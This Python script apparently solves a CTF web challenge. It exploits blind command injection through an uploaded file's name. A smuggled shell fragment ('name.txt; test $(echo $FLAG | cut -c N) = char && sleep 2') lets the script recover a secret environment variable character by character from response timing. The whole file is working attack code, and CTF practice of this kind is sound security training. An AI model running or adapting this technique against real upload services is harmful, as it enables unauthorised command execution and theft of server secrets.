OffSec-CTF/web-cmdi/05_virusvault/solve.py

import string
import time

import requests

files = {"specimen": ("name.txt; sleep 5", "\r\n", "application/octet-stream")}
url = "https://552d42c0-a789-405e-82e6-fc37e974d764.offsec.m0lecon.it/scan"

count = 1
flag = ""
banned = "/\\"
while count < 50:
    for char in string.printable:
        if char not in banned:
            # print(f"Testing {char}")
            files = {
                "specimen": (
                    f"name.txt; test $(echo $FLAG | cut -c {count}) = {char} && sleep 2 ",
                    "\r\n",
                    "application/octet-stream",
                )
            }
            start = time.perf_counter()
            response = requests.post(url, files=files)
            elapsed = time.perf_counter() - start
            if elapsed > 2:
                print(f"Found char: {char}")
                flag += char
                count = count + 1
                print(f"Actual flag: {flag}")
                break